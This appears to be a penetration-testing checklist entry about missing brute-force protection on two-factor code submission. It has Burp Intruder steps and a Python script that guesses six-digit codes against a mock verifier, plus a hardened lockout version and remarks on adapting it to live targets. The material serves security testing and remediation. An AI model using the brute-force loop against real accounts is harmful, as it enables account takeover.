V2 - Authentication
Missing brute-force protection for two-factor authentication
POC
- Send the request that submits the 2FA code to Burp Intruder
- Brute-force the 2FA code parameter (a six-digit numeric code has only 1,000,000 possible values, and the attempt counter is not enforced per account, session or IP)
- Observe a difference in response length (or status code) between the correct and an incorrect code; the lack of any lockout, throttling or CAPTCHA after repeated failures confirms the finding
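The steps above, as an added example that is not part of the original checklist: a mock 2FA verifier stands in for the target endpoint (the class, its status codes and response bodies are assumptions chosen for the demo, not any real product's API), a brute-forcer iterates the six-digit code space and flags the candidate whose response length is the outlier, the same signal Intruder's length column gives, and the hardened configuration of the same verifier locks the session after five failures so the loop stops early.

```python
"""Brute-forcing a 2FA code by response-length difference, against a
vulnerable and a hardened verifier. Added example; the verifier is a
constructed stand-in for the target, not a real application."""
import hmac
from collections import Counter
from dataclasses import dataclass, field

CODE_SPACE = 10**6  # six-digit numeric codes: 000000..999999


@dataclass
class Verifier2FA:
    """Stand-in for the endpoint that checks the second factor (assumed API)."""
    expected_code: str
    max_attempts: int = 5           # hardened: lock after this many failures
    lockout_enabled: bool = True    # set False to reproduce the vulnerable behaviour
    failures: dict = field(default_factory=dict)  # session id -> failed attempts

    def verify(self, session_id: str, code: str):
        """Returns (http_status, body). Bodies differ in length on success/failure,
        which is the signal the attacker sorts on."""
        if self.lockout_enabled and self.failures.get(session_id, 0) >= self.max_attempts:
            return 423, '{"error":"locked"}'
        # Constant-time compare so timing does not leak the code either.
        if hmac.compare_digest(code, self.expected_code):
            self.failures.pop(session_id, None)
            return 200, '{"status":"ok","redirect":"/account"}'
        # Real implementations should count per account (and IP), not only per
        # session, and invalidate the pending 2FA challenge once the limit is hit.
        self.failures[session_id] = self.failures.get(session_id, 0) + 1
        return 401, '{"error":"invalid code"}'


def brute_force(verifier: Verifier2FA, session_id: str, codes=None):
    """Sends codes in order and returns (found_code, attempts).

    A candidate is flagged when its response length is the single outlier among
    the lengths seen so far (equivalent to sorting Intruder results by length).
    Stops with (None, attempts) if the target answers 423 (locked out) or the
    space is exhausted."""
    seen = Counter()      # response length -> how many responses had it
    first_code = {}       # response length -> first code that produced it
    attempts = 0
    for n in (codes if codes is not None else range(CODE_SPACE)):
        code = f"{n:06d}"
        status, body = verifier.verify(session_id, code)
        attempts += 1
        if status == 423:             # lockout engaged: brute force is blocked
            return None, attempts
        length = len(body)
        seen[length] += 1
        first_code.setdefault(length, code)
        # Once one length has repeated, a length seen exactly once is the success.
        if len(seen) >= 2 and max(seen.values()) >= 2:
            for length_seen, count in seen.items():
                if count == 1:
                    return first_code[length_seen], attempts
    return None, attempts


if __name__ == "__main__":
    vulnerable = Verifier2FA("004242", lockout_enabled=False)
    print(brute_force(vulnerable, "sess-1"))   # code recovered after 4243 requests
    hardened = Verifier2FA("004242")
    print(brute_force(hardened, "sess-2"))     # (None, 6): locked before recovery
```

Against a live target the loop body is an HTTP request with the session cookie and CSRF token from the intercepted request; the outlier-length logic is unchanged. The hardened verifier shows the check a fix should add: a failure counter that ends the 2FA challenge after a small number of attempts, rather than relying on the code space alone.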
Impact
Low-Medium
Likelihood
Low